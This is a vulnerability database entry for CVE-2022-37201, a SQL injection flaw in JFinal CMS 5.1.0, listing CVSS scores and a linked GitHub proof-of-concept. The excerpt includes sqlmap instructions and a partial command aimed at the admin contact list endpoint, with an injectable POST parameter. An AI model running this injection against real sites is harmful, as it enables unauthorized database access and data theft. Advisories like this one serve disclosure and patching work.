8.8
CVSSv3

CVE-2022-37201

Published: 15/09/2022 Updated: 19/09/2022
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 0

Vulnerability Summary

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

jflyfox jfinal cms 5.1.0

Github Repositories

CVE-2022-37201 POC

CVE-2022-37201 CVE-2022-37201 POC POC First of all you should install sqlmap you need set target domain or IP your cookie the run the shell sqlmap -u targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list --thread 8 --batch --smart --random-agent --data " formorderColumn=*&formorderAsc=&attrname=%E4%B8%89&totalRecords=2&pag